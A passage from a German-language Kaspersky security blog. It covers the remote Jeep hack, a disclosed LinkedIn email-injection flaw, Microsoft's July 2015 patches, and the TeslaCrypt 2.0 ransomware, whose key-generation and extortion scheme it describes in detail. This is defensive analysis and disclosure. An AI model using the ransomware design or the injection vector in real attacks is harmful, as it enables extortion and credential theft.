Alle Bedrohungen

Viren

Hacker

Spam

Alle Seiten    Viren
  
Virus Enzyklopädie
Alarme
Analysen
Nachrichten
Glossar
Weblog

 
Kalender

<< 2015  
Jan Feb Mär
Apr Mai Jun
Jul Aug  
     
Über die Autoren des Tagebuches
Über die Autoren des Tagebuches

Das Analytiker-Tagebuch ist ein weblog, das von den Analytikern des Kaspersky Lab unter der Leitung von Eugene Kaspersky unterhalten wird. Erfahren Sie mehr über die Autoren des weblog.

Cybercrime Umfrage

Sobald Sie Ihren PC mit dem Internet verbinden, wird er zu einem potenziellen Ziel für Cyberkriminelle. Genauso wie Einbrecher bei einem ungesicherten Haus leichtes Spiel haben, ist ein ungeschützter PC wie eine offene Einladung an Autoren von Malware. Cyberbedrohungen werden nicht nur immer raffinierter, sondern nehmen auch ständig zu: Unser Antiviruslabor verzeichnet derzeit über 17.000 neue Internetbedrohungen pro Tag.

Zur Umfrage

 

  Home / Weblog

Analytiker-Tagebuch

Zero-Day: jetzt auch in Autos


  23 Juli 2015 | 15:36  MSK

Ihr Kommentar  

Denis Legezo
Andrey Nikishin

Der vergangene Dienstag war ein wichtiger Tag für die IT-Sicherheitsbranche. Forscher informierten über die Ausnutzung der ersten jemals da gewesenen Zero-Day-Sicherheitslücke (0-day) in Autos. Am Beispiel eines Jeep Cherokee wurde eine drahtlose Attacke durchgeführt.

Charlie Miller und Chris Valasek entdeckten die Schwachstelle im Bordcomputer des Wagens. Von Attacken auf solche Systeme ist schon lange die Rede - allerdings nur unter der Bedingung, wenn potentielle Verbrecher Zugriff auf die Diagnoseschnittstelle haben. Ein entfernter Angriff auf kritische Systeme eines Wagens blieb allerdings ein rein theoretisches Szenario, vor dem Experten schon seit langem warnen (unter anderem auch die Experten von Kaspersky Lab). Viele hofften allerdings, dass die Automobilhersteller sich der Risiken bewusst sind, die die Ausnutzung solcher Sicherheitslücken mit sich bringen würde, und dass sie dieses Szenario zu verhindern wüssten. Wir haben sie überschätzt.

Über das Bordcomputersystem verschafften sich die Forscher Zugriff nicht nur auf nicht kritische Einstellungen, sondern auch auf die Steuerung des Fahrzeugs. Die technischen Details des Hacks wollen die Forscher im August veröffentlichen, heute ist allerdings bereits die allgemeine Entwicklung der Ereignisse bekannt.

Hack des Fahrzeugs

Zunächst war der Fahrer nicht mehr in der Lage, die außer Rand und Band geratene Klimaanlage, das Radio und die Scheibenwischer zu steuern. Und dann verlor er die Kontrolle über das Fahrzeug selbst. Das Gaspedal und die Bremse gehorchten nur noch den Sicherheitsforschern, die irgendwo entfernt an ihren Rechnern saßen, aber nicht mehr dem Fahrer hinter dem Steuer.

Dabei muss man wissen, dass das Auto nicht modifiziert war. Die oben beschriebenen Manipulationen wurden durch eine Sicherheitslücke in dem an Bord installierten Unterhaltungssystem Uconnect ermöglicht, das für die Verbindung mit der Außenwelt über die Infrastruktur des Mobilfunkanbieters Sprint in Fahrzeugen des Autokonzerns FCA (Chrysler, Dodge, Fiat, Jeep und Ram) verantwortlich ist. Es reicht aus, die externe IP-Adresse des Opfers zu kennen, um den Code in der Haupteinheit zu überschreiben (diese Geräte werden etwas später genauer besprochen).

Der Konzern hat bereits ein Software-Patch für Uconnect herausgegeben, das entweder von offiziellen Händlern oder – mit den entsprechenden technischen Fähigkeiten – auch vom Fahrzeugführer selbst über den USB-Port installiert werden kann. Solange aber können die Forscher, nachdem sie sich mit dem Netz von Sprint verbunden haben und die von ihnen gefundene Zero-Day-Sicherheitslücke ausnutzen, die Fahrzeugidentifizierungsnummer (VIN), die GPS-Koordinaten und die IP-Adresse des Wagens sehen. Ein konkretes Fahrzeug unter 471.000 Autos mit Uconnect an Bord ausfindig zu machen, ist laut Aussage der Forscher selbst allerdings keine leichte Aufgabe.

Kaspersky Lab: Schutzkonzept

Das ist nicht der erste Vorfall, der die Mängel in den Sicherheitsmechanismen, die standardmäßig in moderne Fahrzeuge integriert sind, ans Tageslicht bringt. Bisher kam es schon zum lokalen Abfangen der Steuerung über das Diagnosegerät OBD-II und zum Austausch der Softwareaktualisierungen über eine falsche Funkbasisstation.

Ebenso wie die Hersteller von Betriebssystemen setzen nun auch die Autokonzerne selbst wichtige, notwendige, doch nicht ausreichende Sicherheitsmechanismen um. Die Situation wird dadurch zugespitzt, dass die Architektur des Bordnetzes der Automobilelektronik Mitte der 1980er Jahre entwickelt wurde, als die Vorstellung, dass Autos einmal mit dem Internet verbunden sein könnten, noch Science Fiction war. Und folglich kann man, auch wenn die elektronischen Komponenten zuverlässig und funktionell sicher sind, dasselbe nicht von ihrem Schutz vor Cyberbedrohungen behaupten. Wir bei Kaspersky Lab sind - wie auch beim Schutz von traditionellen Rechennetzen - davon überzeugt, dass vollwertige, vielschichtige Sicherheit nur durch eine Kombination der richtigen Architektur, die unter Berücksichtigung aller Risiken, darunter auch Cyberbedrohungen, entwickelt wurde, mit der Einstellung der vorinstallierten Mittel und der Installation spezialisierter Lösungen gewährleistet werden kann.

Architektur

Der Ansatz von Kaspersky Lab fußt auf zwei grundlegenden Architektur-Prinzipien: Isolation und Kommunikationskontrolle.

Die Isolation garantiert, dass zwei unabhängige Größen sich nicht gegenseitig beeinflussen können. Eine Unterhaltungsanwendung kann beispielsweise nicht auf ein technologisches Netz Einfluss ausüben. Weder an Bord eines Flugzeugs noch im Auto.

Die Kontrolle der Kommunikation garantiert, dass zwei unabhängige Einheiten, die miteinander interagieren müssen, damit das System funktioniert, dies nur in vollständiger Übereinstimmung mit der geltenden Sicherheitspolitik tun. So kann beispielsweise das System zum Sammeln von telemetrischen Daten und deren Übermittlung ins Servicecenter nur Daten über den Zustand des Fahrzeugs lesen, aber es kann keine Steuerungsbefehle weitergeben. Eine solche Kontrolle wäre auch dem Jeep-Fahrer entgegengekommen.

Der Einsatz von Kryptografie und Authentifikation zur Übermittlung und zum Empfang von Informationen von außen ist ebenfalls ein unerlässlicher Teil eines sicheren Systems. Doch den Forschungsergebnissen von Miller und Valasek nach zu urteilen, wurden im Jeep entweder schwache, angreifbare Algorithmen angewendet oder die Kryptografie wurde fehlerhaft umgesetzt.

Der beschriebene Ansatz – Isolation und Kontrolle der Verbindung – kann selbstverständlich auf die Microkernel-Architektur von Betriebssystemen mit kontrollierbarer Interprozesskommunikation übertragen werden. Jede logische Domain erhält einen eigenen Adressraum und die gesamte Kommunikation zwischen den Domains läuft immer über einen Sicherheitsmonitor.

Produkte

Von der Bordelektronik, die die kritisch wichtigen Funktionen des Fahrzeugs steuert und theoretisch Angriffen ausgesetzt sein könnte, sind besonders die Haupteinheit (Head Unit, HU) und die elektronischen Steuereinheiten (electronic control unit, ECU) zu nennen, die das gesamte Controllernetzwerk bilden. Das sind Einheiten zur Steuerung des Motors, der Getriebes, der Federung usw.

Die Haupteinheiten laufen unter Echtzeit-Betriebssystemen (real time operating systems (RTOS) – QNX, VxWorks und anderen). Kaspersky Lab beabsichtigt ein eigenes geschütztes Betriebssystem für Haupteinheiten anzubieten, sobald alle dafür notwendigen Zertifikate eingeholt wurden.

Beide oben beschriebenen Architektur-Prinzipien (Isolation und Kommunikationskontrolle) sind grundlegende Prinzipien der Funktionsweise von KasperskyOS – einem sicheren Microkernel-Betriebssystem mit kontrollierbarer Interprozesskommunikation.

Das Betriebssystem wurde grundlegend neu entwickelt und Sicherheit hatte von vornherein oberste Priorität. Darin liegt auch der wesentliche Unterschied zwischen unserer Entwicklung und Betriebssystemen, die heute auf Bordcomputern von Fahrzeugen laufen. Die Schlüsselkomponente des sicheren Betriebssystems haben wir Kaspersky Security System (KSS) genannt.

Diese Laufzeitumgebung ist für die Berechnung der Sicherheitseinstufung von Ereignissen verantwortlich, die im System geschehen. Auf der Grundlage dieser Einstufung entscheidet der Kernel des Betriebssystems, ob der jeweilige Prozess oder die Interprozesskommunikation zugelassen oder blockiert werden soll. Mit Hilfe des KSS kann jede beliebige Aktivität kontrolliert werden – der Zugriff auf Ports, Dateien, auf Netzressourcen über konkrete Anwendungen usw. Aktuell läuft KSS unter PikeOS und Linux.

Was die elektronischen Steuerungseinheiten betrifft, auf denen nur ein relativ geringer Anteil von Firmware-Code entfällt, so beabsichtigt Kaspersky Lab ebenfalls mit Entwicklern von Microelektronik zusammenzuarbeiten, um gemeinsam die Sicherheit dieser integrierten Software zu gewährleisten.

Anstelle eines Fazits

Niemand möchte wirklich auf die Vorteile und den Komfort verzichten, den die Computerisierung von Fahrzeugen mit sich gebracht hat. Doch wenn die Automobilhersteller sich nicht ernsthaft des Problems der Cyberbedrohungen annehmen, denen ein mit dem Internet verbundener Wagen ausgesetzt ist, und wenn sie nicht anfangen, dasselbe auch von den Herstellern der Automobil-Komponenten zu fordern, so werden Leute, die sich Sorgen um ihre Sicherheit machen, gezwungen sein, wieder auf klassische Fahrzeuge umzusteigen. Gut, in alten Autos gibt es keine Computer. Ja, in alten Autos gibt es auch keine computergesteuerte Einspritzung, kein Navigationssystem, keine Klimaautomatik und andere neumodische Spielereien. Dafür gehorchen sie aber ausschließlich dem Menschen hinter dem Steuer.


Forscher bei Kaspersky Lab warnen LinkedIn vor möglichen Spear-Phishing-Attacken


  Ido Naor       23 Juli 2015 | 13:19  MSK

Ihr Kommentar  

Am 14. November 2014 meldeten Forscher bei Kaspersky Lab dem weltweit größten business-orientierten sozialen Netzwerk, LinkedIn, ein Sicherheitsproblem, das für seine 360+ Millionen Nutzer zu einer kapitalen Bedrohung hätte werden können. Da LinkedIn so viele Leute aus der Geschäftswelt anzieht, hätte diese Sicherheitslücke es Angreifern ermöglichen können, effizient signierte und vertrauenswürdig wirkende Spear-Phishing-Kampagnen durchzuführen, Anmeldedaten zu stehlen und möglicherweise ausgesuchte Opfer aus der Ferne zu kontrollieren, ohne auch nur einmal Social Engineering eingesetzt zu haben.

LinkedIn machte sich umgehend daran, die Bedrohung zu beseitigen und hat mittlerweile ein Fix veröffentlicht, mit dem die Sicherheitslücke geschlossen wurde.

“Indessen sollte gewisser HTML-Content eingeschränkt sein und wir haben ein Fix veröffentlicht und den Kaspersky-Experten unseren Dank ausgesprochen; die Wahrscheinlichkeit der Ausnutzung auf gängigen modernen E-Mail-Plattformen ist äußerst gering”, sagt David Cintz, Senior Technical Program Manager beim LinkedIn Security Ecosystem.

Forscher stießen auf die Sicherheitslücke, nachdem sie in vielen Postings Unterschiede in den Fluchtsymbolen beim Posten von verschiedenen Geräten aus festgestellt hatten. Die zweite Sache, die ihre Aufmerksamkeit erregte, war eine Fehlfunktion in dem Backend-Parser der Plattform, der einfach einen CRLF (Betätigung der Enter-Taste) in einen HTML-Tag <br /> interpretiert, indem er ihn als Text auf das Posting anwendet. Beides hatte nichts miteinander zu tun, aber beides warf Fragen auf, die nach Antworten verlangten.

Auch wenn es nach keiner großen Sache klingt, kann ein kleiner Defekt wie dieser die Aufmerksamkeit von Angreifern erregen. In Hinblick auf diese zwei Fehlfunktionen waren die Forscher davon überzeugt, dass irgendetwas faul sein musste. Es scheint, als hätte es niemand bemerkt. Nur das geübte Auge konnte sehen, wie die Puzzleteile zusammengehören.

Betätigung der ENTER-Taste als Klartext <br /> Element interpretiert

Das Absenden zahlreicher Posts von einem Webbrowser hat erfolgreich einen Teil des Verhaltens dieser Unterschiede in den Fluchtsymbolen imitiert, aber es ergab keinen Hinweis darauf, wie die Anti-Cross-Site-Scripting(XSS)-Engine umgangen und ein Angriff erzeugt werden kann.

Weitere Untersuchungen brachten neue Erkenntnisse. Es gab einen Grund dafür, warum die Ausgabe von einem Gerät nicht so kodiert wurden wie von einem anderen.

Das Absenden von Kommentaren mit HTML-Tags von der Webplattform erzeugte %3C als kleiner-als-Zeichen, während dieselbe Eingabe von einem mobilen Gerät zu &lt; codiert wurde. Weitere Untersuchungen führten uns zu zwei unterschiedlichen Plattformen. Doch das bedeutete nicht, dass die Webplattform angreifbar war. Oder doch?

Ebenfalls äußerst aufschlussreich war die Erkenntnis, dass jeder Kommentar zu einem Posting über eine E-Mail-Plattform zu allen anderen Nutzern geschickt wird, die Teil der Bedrohung waren. Die Unterschiede im Körper der E-Mail bestätigten unsere Befürchtungen. Die folgenden Screenshots illustrieren die beiden Szenarien:

Von der Website geposteter Kommentar, der ordnungsgemäß escapt wurde

Von der mobilen App geposteter Kommentar ohne Escape

Dadurch war der Beweis erbracht, dass es zwei verschiedene E-Mail-Plattformen gibt, und dass mobile Benachrichtigungen dabei helfen können, schädliche Payload ohne benutzerseitig bereitgestellte Input-Validierung in Umlauf zu bringen.

Signierte E-Mail, die von LinkedIn ungeachtet ihres Inhalts zurückgegeben wird

Soziale Plattformen sind ein wichtiges Ziel für Hacker. Unternehmen im Allgemeinen werden täglich von „White Hat“-Hackern kompromittiert, die versuchen sich ein Stück vom Kuchen zu sichern, wenn es um den Schutz und die Sicherheit des Internets geht. Doch was ist, wenn ein „Black Hat“-Hacker auf das Problem stößt?

Ein Blick auf die folgende Grafik zeigt, wie diese Art von Sicherheitsproblemen einem Angreifer dabei helfen kann, die Frage nach der Verbreitung von Schadsoftware zu beantworten, die als legitime Benachrichtigung eines sozialen Netzwerkes getarnt ist.

Generischer Malware-Verbreitungszyklus

Malware-Autoren investieren eine Menge Zeit in jeden dieser Meilensteine. Jeder Schritt hat große Auswirkungen auf das Gesamtergebnis: Solide Programmierung, die auf zahlreiche Systeme/Geräte, Packer und Binder, Obfuskation und Verschlüsselung anwendbar ist, die Aufklärung mit der richtigen Verbreitungsmethode kombiniert und das richtige Zero-Day-Exploit oder Exploit findet, um das System aus der Ferne zu kontrollieren.

Um wertvolle Zeit zu sparen, finden Angreifer Wege und Mittel, um mit den Autoren in Kontakt zu treten und ihren Bedarf an jedem Meilenstein zu decken, als wären sie Waren in einem Regal. Arbeitet man die gesamte Einkaufsliste ab, um sich diese Angriffsart zusammenbrauen zu können, könnte das recht teuer werden. Eine Business-orientierte soziale Plattform, die Informationen über Millionen von Geschäftsleuten, männlich wie weiblich, ihre Titel, ihre Kollegen, Daten zu ihren Karrieren und vieles mehr enthält, kann überaus wertvoll sein. Einen Nutzer anzugreifen, ist nicht besonders schwierig, und die Ausnutzung dieser Informationen ist nur einen Kommentar entfernt.

Wähle Dein Opfer

Das Einschleusen eines schädlichen Kommentars in den Postthread eines Nutzers zieht automatisch das Versenden einer Benachrichtigung an seinen E-Mail-Account nach sich, unabhängig vom E-Mail-Provider oder der Verbindungshierarchie zwischen dem Opfer und dem Angreifer.

Auch wenn so scheint, als hätte der Anwendungsserver die gefährlichen Zeichen escapt, wird die Payload nur von der Haupt-App escapt. Das E-Mail-Template wird gesendet, wie es ist.

Einschleusen der schädlichen Payload via mobile App

Im schlimmsten Fall, wenn ein E-Mail-Provider den Inhalt einer eingehenden Mail nicht ordnungsgemäß escapt, könnte der Autor der Malware das Problem ausnutzen, um eine schädliche JavaScript-Einschleusungsattacke durchzuführen, auch bekannt als Stored XSS.

In einem anderen Szenario könnte ein passendes HTML-Formular eine Rolle spielen, das Informationen über das Opfer sammelt oder es auf eine Site weiterleitet, wo eine schädliche ausführbare Datei heruntergeladen werden kann.

Beispiel-Szenario – Diebstahl von Anmeldedaten

Im letzten November informierten die Forscher von Kaspersky Lab das Sicherheitsteam von LinkedIn über das Problem. Die Plattform wurde repariert und die Bedrohung beseitigt.

Wie Sie vermeiden können, selbst zum Opfer zu werden:

  1. Verwenden Sie eine moderne Internet Security-Lösung, um gefährliche Umleitungen auf Sever herauszufiltern, die Schadprogramme, Phishing-Links und anderes enthalten. Wenn Sie bereits eine solche Lösung installiert haben, halten Sie sie immer auf dem neusten Stand.
  2. In Attachments oder unter Links – selbst wenn sie von bekannten Personen stammen – kann sich schädlicher Inhalt verbergen. Überlegen Sie es sich gut, ob Sie sie öffnen oder nicht.
  3. Melden Sie sich nicht mit Ihrer Dienst-E-Mail-Adresse bei sozialen Plattformen an.

Microsoft Security Updates Juli 2015


  Kurt Baumgartner       17 Juli 2015 | 16:14  MSK

Ihr Kommentar  

Ein Monat der Sicherheitslücken in RDP und Hyper-V, die das entfernte Ausführen von willkürlichem Code ermöglichen, ein Monat der eingeschränkten zielgerichteten Ausnutzung und der verantwortungsvollen Offenlegung

Microsoft hat diese Woche eine lange Liste von Updates für zahlreiche Technologien mit 14 Sicherheitsbulletins (MS15-058, MS15-065 – MS15-077) veröffentlicht, die 58 Schwachstellen beseitigen, von denen mindestens 47 durch einen verantwortungsvollen Offenlegungskanal gemeldet wurden. Unterdessen werden viele ausgenutzt und als Teil eingeschränkter zielgerichteter Attacken in freier Wildbahn entdeckt, wie z.B. die Microsoft Office RCE cve-2015-2424, ATMFD.DLL EoP cve-2015-2387 und das Internet Explorer JScript9 RCE cve-2015-2419. Einige von ihnen waren auch die Folge von Lecks. Einige haben ein sehr attraktives offensives Tool, um sich zu schützen, daher ist zu erwarten, dass diese Exploits immer wieder verwendet und reaktiviert werden. Die meisten Juli-Updates fallen in zwei Hauptkategorien, und die aktualisierten Technologien sind unten aufgelistet. Alle Windows-Versionen ab Windows 7 und höher haben eine kritische RCE-Sicherheitslücke der einen oder anderen Art. Aktualisieren Sie so schnell wie möglich.

Sicherheitslücken, die das entfernte Ausführen von willkürlichem Code ermöglichen, in:

  • Windows Server Hyper-V
  • Windows DLL Handling
  • SQL Server
  • Internet Explorer
  • VBScript Engine
  • Remote Desktop Protocol (RDP)
  • Microsoft Office

Sicherheitslücken, die die Erhöhung der Privilegien ermöglichen, in:

  • Windows Graphics Component
  • Windows Kernel (win32k.sys)
  • Windows Installer Service
  • OLE
  • Windows Remote Procedure Call Service
  • Windows ATM Font Driver
  • SQL Server

Sicherheitslücken, die in andere Kategorien fallen, wie XSS-Filter-Umgehung, Aufdeckung von Informationen, ASLR-Umgehung, gefälschte Authentifizierung, betreffen die folgenden Technologien:

  • Internet Explorer
  • Microsoft Excel
  • Netlogon
  • Windows Kernel (win32k.sys)

Zu den interessantesten dieser Sicherheitslücken zählen die RDP-RCE und die Hyper-V RCE. Die RDP-Schwachstelle betrifft sogar die zurückgebaute Windows Server 2012 Server Core-Installation, und sie wurde anscheinend von einer anonymen Quelle gemeldet, die – was ungewöhnlich ist – keine Anerkennung für die Entdeckung einer entfernt ausnutzbaren kritischen Sicherheitslücke wollte, in einem Service, der häufig nach außen gefährdet ist. Während Microsoft daran zweifelt, dass entfernte Codeausführung verlässlich ist, so räumen sie zumindest die Möglichkeit ein. In der Vergangenheit wurde ihr Dementi von Forschern dementiert, die das Potential für Heap Feng Shui untersuchten, das zur Ausnutzung gewisser Services führte, inklusive den 2010-Bug in ihrem IIS FTPsvc.

Ein anderes Pärchen sind die Hyper-V RCE, bei der es sich um eine Pufferüberlauf-Sicherheitslücke - cve-2015-2361 – in dem Storvsp.sys-Treiber und eine ungewöhnliche “Datenstruktur-Sicherheitslücke” - cve-2015-2362 – in Vmicrdv.dll, Vmicvss.dll, Vmicshutdown.dll, Vmictimesync.dll, Vmicheartbeat.dll und Vmickvpexchange.dll handelt, die über Windows Hyper-V auf Windows Server 2008, Windows Server 2008 R2, Windows 8 und Windows Server 2012 und Windows 8.1 und Windows Server 2012 R2 verfügbar sind. Beide wurden von einem Microsoft-Mitarbeiter gefunden. Wie auch schon vor Jahren das Cloudburst-Exploit auf der VMWare, ermöglichen diese Sicherheitslücken die Ausführung von Code mit Entkommen aus einem virtuellen Gast-Betriebssystem auf das Hostsystem.

Hier die vollständige Liste der aktualisierten gefixten Sicherheitslücken:

cve-2015-1729
cve-2015-1733
cve-2015-1738
cve-2015-1761
cve-2015-1762
cve-2015-1763
cve-2015-1767
cve-2015-2361
cve-2015-2362
cve-2015-2363
cve-2015-2364
cve-2015-2365
cve-2015-2366
cve-2015-2367
cve-2015-2368
cve-2015-2369
cve-2015-2370
cve-2015-2371
cve-2015-2372
cve-2015-2373
cve-2015-2374
cve-2015-2375
cve-2015-2376
cve-2015-2377
cve-2015-2378
cve-2015-2379
cve-2015-2380
cve-2015-2381
cve-2015-2382
cve-2015-2383
cve-2015-2384
cve-2015-2385
cve-2015-2387
cve-2015-2388
cve-2015-2389
cve-2015-2390
cve-2015-2391
cve-2015-2397
cve-2015-2398
cve-2015-2401
cve-2015-2402
cve-2015-2403
cve-2015-2404
cve-2015-2406
cve-2015-2408
cve-2015-2410
cve-2015-2411
cve-2015-2412
cve-2015-2413
cve-2015-2414
cve-2015-2415
cve-2015-2416
cve-2015-2417
cve-2015-2419
cve-2015-2421
cve-2015-2422
cve-2015-2424
cve-2015-2425

TeslaCrypt 2.0 im Gewand von CryptoWall


  Fedor Sinitsyn       14 Juli 2015 | 14:02  MSK

Ihr Kommentar  

Inhalt

Die Familie der Dateien verschlüsselnden Erpressersoftware TeslaCrypt ist eine relativ neue Bedrohung, die ersten Exemplare wurden erst im Februar 2015 entdeckt. Seither zieht der Schädling als „Schrecken der Computergamer“ wie ein Unwetter durch die Massenmedien, da er gezielt eine Vielzahl von Dateien infiziert, die mit Computerspielen in Zusammenhang stehen (Speicher, Nutzerprofile usw.). Im Visier des Trojaners standen User in den USA, Deutschland, Spanien und anderen Ländern, einige Dutzend Infektionsversuche wurden zudem in Russland registriert.

TeslaCrypt befindet sich noch immer in der aktiven Entwicklungsphase: Innerhalb der letzten Monate hat der Schädling sein Äußeres verändert, den Namen, den er seinen Opfern präsentiert (der Schädling tarnte sich als CryptoLocker, trat unter den Namen TeslaCrypt und AlphaCrypt auf), die Erweiterungen der verschlüsselten Dateien (.ecc, .ezz, .exx) sowie andere Details in der Umsetzung.

Vor kurzem hat Kaspersky Lab die neuste Version des Trojaners entdeckt - TeslaCrypt 2.0. Diese Version unterscheidet sich von ihren Vorgängern zum einen durch ein deutlich verbessertes kryptografisches Schema, auf Grund dessen es zum gegenwärtigen Zeitpunkt unmöglich ist, die von TeslaCrypt betroffenen Dateien zu entschlüsseln, und zum anderen durch eine Abkehr von dem GUI zugunsten einer HTML-Seite, die zudem von einem anderen Trojaner kopiert wurde, nämlich Cryptowall.

Die Produkte von Kaspersky Lab detektieren Vertreter der Familie TeslaCrypt als Trojan-Ransom.Win32.Bitman. Die neuste Version des Trojaners, die Thema des vorliegenden Artikels ist, wird als Trojan-Ransom.Win32.Bitman.tk detektiert, ihre MD5-Hash lautet: 1dd542bf3c1781df9a335f74eacc82a4

Evolution der Bedrohung

Jedes Sample von TeslaCrypt enthält eine interne Version des Schädlings. Die erste von uns entdeckte Version hatte die Nummer 0.2.5, ihr grafisches Interface, die Fensterüberschrift eingeschlossen, war einem anderen erpresserischen Verschlüsselungsprogramm entliehen, und zwar CryptoLocker.

TeslaCrypt 0.2.5

Doch bereits mit Version 0.4.0 hatten die Entwickler vonTeslaCrypt das Äußere des Schädlings komplett verändert.

TeslaCrypt 0.4.0

Doch unabhängig von der Version bleiben die folgenden Merkmale der Familie unverändert:

  • Der Trojaner generiert selbst eine neue eindeutige Bitcoin-Adresse und einen dazugehörigen privaten Schlüssel. Die Adresse wird gleichzeitig als ID des Opfers verwendet sowie für den Empfang der Lösegeldzahlung des Opfers.
  • Für die Verschlüsselung der Daten wird der Algorithmus AES-256-CBC verwendet, alle Dateien werden mit einem Schlüssel chiffriert.
  • Nicht verschlüsselt werden Dateien, die größer sind als 0x10000000 Byte (~268 MB).
  • Die C&C-Server sind im Netz Tor untergebracht, die Kommunikation mit ihnen erfolgt über öffentliche tor2web-Services.
  • Unter den zu verschlüsselnden Dateien sind viele Erweiterungen, die Dateien von Computerspielen zugeordnet werden.
  • Der Trojaner löscht die Schattenkopien.
  • Ungeachtet der „Horrorstorys“ über RSA-2048, die dem Opfer demonstriert werden, wird dieser Algorithmus im Code in keiner Weise angewendet.
  • Der Trojaner ist in C++ programmiert, durch einen Microsoft-Compiler zusammengesetzt und die Umsetzung der kryptografischen Algorithmen ist einer OpenSSL-Bibliothek entnommen.

Interessante Fakten

  • Die frühen Versionen von TeslaCrypt (0.2.5 – 0.3.x) haben selbstständig überprüft, ob auf der Website http://blockchain.info eine Zahlung in Bitcoin eingegangen ist. Im Erfolgsfall berichtete der Schädling dem Steuerungsserver darüber und erhielt daraufhin den Schlüssel zur Dechiffrierung der Dateien. Dieses Schema ist angreifbar, da es einem Spezialisten ermöglicht, selbst eine solche Anfrage an den C&C-Server zu richten und auch ohne Zahlungseingang den geheimen Schlüssel zu erhalten.
  • Die Versionen 0.2.5 – 0.3.x verwahrten den Dechiffrierungsschlüssel (zusammen mit anderen Daten) in einer eigenen Dienstdatei key.dat. Der Bereich mit dem Schlüssel wurde in dieser Datei erst nach Abschluss der Verschlüsselung mit Nullen gelöscht, wodurch es möglich war, den Schlüssel zu speichern, wenn die Arbeit des Verschlüsselungsprogramms unterbrochen wurde (beispielsweise durch Abschalten des PCs). Danach konnte der Schlüssel aus der Datei key.dat entnommen werden, um alle Dateien zu dechiffrieren.
  • In der Version 0.4.0 wurde die Datei key.dat in storage.bin umbenannt und der Dechiffrierungsschlüssel wurde nicht in offener Form gespeichert, sondern nach dem Modul des Systems der standardmäßigen elliptischen Kurve secp256k1 umgewandelt. Nach Abschluss der Verschlüsselung wurde der Schlüssel nicht mit Nullen gelöscht, sondern mit zufälligen Bytes, doch solange dieser Bereich nicht gelöscht ist, kann man den Schlüssel trotzdem extrahieren – das wurde auch in unserem Tool RakhniDecryptor umgesetzt.

Heute

Vor kurzem erregte ein Sample dieses Trojaners mit der internen Versionsnummer 2.0.0 unsere Aufmerksamkeit – was hatte sich wohl dieses Mal geändert?

Als Erstes sprang uns ins Auge, dass der Code aus TeslaCrypt verschwunden war, der für die Darstellung der GUI (Grafische Benutzeroberfläche) verantwortlich ist. Anstelle dessen zeigt der Trojaner nach der Verschlüsselung nun im Browser eine HTML-Seite an, die von einem anderen weit verbreiteten Erpresserprogramm kopiert wurde – CryptoWall 3.0.

Die Seite, die sich mit einem Klick auf den dem Opfer angebotenen Link öffnet, imitiert vollständig die Bezahlseite von CryptoWall, doch selbstverständlich führt die angezeigte URL auf einen Server von TeslaCrypt – die Autoren dieses Trojaners haben eindeutig nicht die Absicht, das Geld ihrer Opfer der Konkurrenz zu überlassen.

TeslaCrypt füllt eine Zeile mit Text über CryptoWall

Wozu diese Maskerade? Hier können wir nur raten: Möglicherweise wollten die Cyberkriminellen ihre Opfer auf diese Weise von dem Ernst der Lage überzeugen. Denn die Dateien lassen sich nach einer „Behandlung“ mit CryptoWall bis heute nicht entschlüsseln, was man von vielen Infektionsfällen mit TeslaCrypt nicht behaupten kann.

So oder so, das ist nicht die einzige Veränderung, die die neue Version von TeslaCrypt bereithält. Wieder einmal wurde das kryptografische Schema weiterentwickelt, was zur Folge hat, dass es nun noch „aufgemotzter“ ist. Bei der Generierung der Schlüssel wird der Algorithmus ECDH angewendet (die Cyberkriminellen haben ihn in den Versionen 0.3.x eingeführt), doch im Gegensatz zu vorherigen Versionen scheint er jetzt eher angebracht zu sein, da er einem bestimmten Zweck dient – er ermöglicht es den Cybergangstern Dateien zu entschlüsseln und dabei nur den „Master-Key“ zu benutzen. Doch alles schön der Reihe nach.

Kryptografisches Schema von TeslaCrypt 2.0

Erzeugung von Schlüsseldaten

Der Trojaner verwendet zwei Schlüssel-Sets: „Masterschlüssel“, die innerhalb eines infizierten Systems einmalig sind, und „Sitzungsschlüssel“, die bei jedem Neustart des Schädlings im System neu generiert werden.

Erzeugung der Master-Keys

Q sei die standardmäßige elliptische Kurve secp256k1 („SECG Kurve über einem 256-Bit-Primkörper“), und G sei das bildende Element der zyklischen Untergruppe der Punktgruppe auf der Kurve.

malware_pub sei der im Körper des Trojaners enthaltene offene Schlüssel der Cyberkriminellen (er ist ein Punkt auf der Kurve Q und wird in Form der Koordinaten x, y gespeichert).

Bei der Infektion eines Systems erzeugt der Trojaner Folgendes:


  • install_id – Infektions-ID – willkürliche 8 Byte.
  • master_btc_priv – geheimer Masterschlüssel – zufällige 32 Byte; wird an den C&C-Server geschickt.
  • master_btc_pub = master_btc_priv * G (Punkt auf der Kurve) – öffentlicher Masterschlüssel; wird in verschlüsselten Dateien gespeichert.
  • btc_address – Bitcoin-Adresse zum Erhalt der Lösegeldzahlung – wird mit einem Standard-Bitcoin- Algorithmus auf Grundlage von master_btc_pub generiert.
  • master_ecdh_secret = ECDH(malware_pub, master_btc_priv) – „allgemeiner Masterschlüssel“, wird für die Dechiffrierung benötigt, wenn master_btc_priv verloren gegangen oder nicht beim C&C angekommen ist; in dieser Form wird er nirgends gespeichert.
  • master_ecdh_secret_mul = master_ecdh_secret * master_btc_priv – Zahl, die die Wiederherstellung von master_btc_priv ermöglicht; wird im System gespeichert.

Anwendung
master_btc_priv (in Übereinstimmung mit dem Bitcoin-Funktionsprinzip) – das ist der private Schlüssel, der unerlässlich ist, um die Bitcoins „abzuheben, die an die frisch erstellte Adresse btc_address geschickt wurden.

Erzeugung von Session-Keys

Bei jedem Start (bei der Erstinfektion oder beispielsweise nach einem Neustart des Computers) generiert der Trojaner immer wieder aufs Neue:

  • session_priv – privater Sitzungsschlüssel – willkürliche 32 Byte. Er wird für die Verschlüsselung der Dateien verwendet und nirgends gespeichert.
  • session_pub = session_priv * G – öffentlicher Sitzungsschlüssel. Wird in verschlüsselten Dateien gespeichert.
  • session_ecdh_secret = ECDH(master_btc_pub, session_priv) – „allgemeiner Sitzungsschlüssel“ – unerlässlich für die Entschlüsselung der Dateien, wird in dieser Form nirgends gespeichert.
  • session_ecdh_secret_mul = session_ecdh_secret * session_priv – Zahl, die die Wiederherstellung von session_ecdh_secret ermöglicht. Wird in verschlüsselten Dateien gespeichert.

Im System gespeicherte Schlüsseldaten

Im Gegensatz zu früheren Versionen verwendet TeslaCrypt 2.0.0 zur Speicherung von Daten nicht key.dat oder storage.bin. Stattdessen wird die Registry benutzt: In HKCU\Software\msys\ID wird der Wert install_id gespeichert, und in HKCU\Software\<install_id>\data ist die folgende Struktur untergebracht:

